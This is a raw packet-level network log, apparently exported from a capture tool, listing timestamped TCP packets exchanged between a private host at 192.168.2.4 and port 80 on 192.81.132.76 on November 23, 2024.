                                                                                                                                                          Nov 23, 2024 12:47:17.116076946 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.116836071 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.116971016 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.116971016 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.117916107 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.118025064 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.118073940 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.119054079 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.119122982 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.119188070 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.119853020 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.119920969 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.119961023 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.120913029 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.120980024 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.121037006 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.121972084 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.122003078 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.122057915 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.172739029 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.207199097 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.207344055 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.207525969 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.212275982 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.281297922 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.281475067 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.281692028 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.285453081 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.285576105 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.288371086 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.293848991 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.294001102 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.294207096 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.302252054 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.302324057 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.304409027 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.310659885 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.310769081 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.312424898 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.319020987 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.319092989 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.319339037 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.327394962 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.327514887 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.327764034 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.336035967 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.336169958 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.336271048 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.344185114 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.344288111 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.344379902 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.352567911 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.352689028 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.356456041 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.361063004 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.361119032 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.361187935 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.482657909 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.482716084 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.483483076 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.485044956 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.485176086 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.486134052 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.489963055 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.490087032 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.492310047 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.495182037 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.496617079 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.497106075 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.500844002 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.500880957 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.501245022 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.504595041 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.504688025 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.505043030 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.509507895 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.509617090 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.509967089 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.514408112 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.514487982 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.514580965 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.519336939 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.519395113 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.519748926 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.524198055 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.524348974 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.528408051 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.531359911 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.531395912 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.531524897 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.534934044 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.535120964 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.536389112 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.539829969 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.540002108 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.540672064 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.544723988 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.544894934 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.545008898 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.549588919 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.549751997 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.550210953 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.554414034 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.554572105 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.554860115 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.559449911 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.559607029 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.559736013 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.563415051 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.563432932 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.563724995 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.568169117 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.568310022 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.568829060 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.603344917 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.660336018 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.683701038 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.683720112 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.684345007 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.684739113 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.684850931 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.688652992 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.688697100 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.688746929 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.692435026 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.694464922 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.694483995 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.694603920 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.697312117 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.697599888 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.700376034 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.701246977 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.701416969 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.705123901 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.705276966 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.705302000 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.708334923 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.708834887 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.708998919 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.710097075 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.712733984 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.712753057 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.714967012 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.716475964 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.716656923 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.719765902 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.720271111 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.720451117 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.724024057 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.724181890 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.724349022 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.726867914 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.726996899 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.728610992 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.730590105 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.730691910 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.733093023 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.734457016 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.734517097 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.737159014 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.738270044 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.738352060 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.740801096 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.741987944 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.742099047 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.744352102 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.745774984 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.745878935 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.748333931 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.749633074 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.749763012 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.751014948 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.753431082 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.753485918 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.757145882 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.757185936 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.757236004 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.760375977 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.760984898 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.761039972 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.764369965 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.764786959 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.764874935 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.768351078 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.768558979 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.768639088 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.771420002 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.772315025 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.772471905 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.776101112 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.776174068 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.776269913 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.776415110 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.779928923 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.834876060 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.888794899 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.888943911 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.889009953 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.890396118 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.890882969 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.890934944 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.891041040 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.894082069 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.894135952 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.894223928 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.897028923 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.897095919 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.897186995 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.900144100 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.900228024 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.900280952 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.903152943 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.903168917 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.903218985 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.905318022 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.905333042 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.905416965 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.908946991 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.909032106 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.909109116 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.911930084 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.911946058 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.912053108 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.912106991 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.912128925 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.912182093 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.915189981 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.915205956 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.915249109 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.917892933 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.917965889 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.918245077 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.921041965 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.921056986 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.921140909 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.923980951 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.924026012 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.924156904 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.926964998 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.926980972 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.927059889 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.929917097 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.929997921 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.930087090 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.932883978 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.932900906 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.932945013 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.935703993 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.935772896 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.935884953 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.938724041 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.938880920 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.938908100 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.940762997 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.940839052 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.940871000 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.943746090 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.943799973 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.943805933 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.946690083 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.946768045 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.946805954 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.951196909 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.951211929 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.951277971 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.954065084 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.954168081 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.954229116 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.956518888 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.956585884 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.956675053 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.959438086 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.959568977 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.959755898 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.962496042 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.962557077 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.962663889 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.965500116 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.965559959 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.965673923 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.968529940 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.968619108 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.968671083 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.971437931 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.971556902 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.971617937 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.974536896 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.974699974 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.974704027 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.977302074 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.977396965 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.977657080 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.980532885 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.980551958 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.980592966 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.983290911 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.983335018 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.983488083 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.986262083 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.986320972 CET4973580192.168.2.4192.81.132.76
